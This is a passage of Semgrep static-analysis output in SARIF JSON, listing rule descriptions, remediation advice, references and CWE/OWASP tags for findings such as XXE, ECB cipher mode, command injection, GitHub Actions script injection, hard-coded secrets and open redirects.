returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"helpUri":"https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","id":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","name":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","properties":{"precision":"very-high","tags":["CWE-252: Unchecked Return Value","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"help":{"markdown":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode)\n - [https://cwe.mitre.org/data/definitions/327.html](https://cwe.mitre.org/data/definitions/327.html)\n - [https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358](https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","id":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","name":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","id":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","name":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"help":{"markdown":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","id":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","name":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","MEDIUM CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"help":{"markdown":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection)\n - [https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections](https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n - [https://securitylab.github.com/research/github-actions-untrusted-input/](https://securitylab.github.com/research/github-actions-untrusted-input/)\n - [https://github.com/actions/github-script](https://github.com/actions/github-script)\n","text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection","id":"yaml.github-actions.security.github-script-injection.github-script-injection","name":"yaml.github-actions.security.github-script-injection.github-script-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.github-script-injection.github-script-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","id":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","name":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","id":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","name":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"help":{"markdown":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string)\n - [https://golang.org/pkg/html/template/#HTML](https://golang.org/pkg/html/template/#HTML)\n","text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string","id":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","name":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.formatted-template-string.formatted-template-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","id":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","name":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"help":{"markdown":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea)\n - [https://tools.ietf.org/html/rfc5469](https://tools.ietf.org/html/rfc5469)\n - [https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA](https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA)\n","text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","id":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","name":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","id":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","name":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Session Token detected"},"help":{"markdown":"AWS Session Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Session Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token","id":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","name":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-session-token.detected-aws-session-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"help":{"markdown":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete)\n - [https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory](https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime](https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime)\n","text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","id":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","name":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","properties":{"precision":"very-high","tags":["CWE-416: Use After Free","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password","id":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","name":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.mysql.mysql-empty-password.mysql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"help":{"markdown":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"helpUri":"https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname","id":"javascript.browser.open-redirect-pathname.open-redirect-pathname","name":"javascript.browser.open-redirect-pathname.open-redirect-pathname","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM 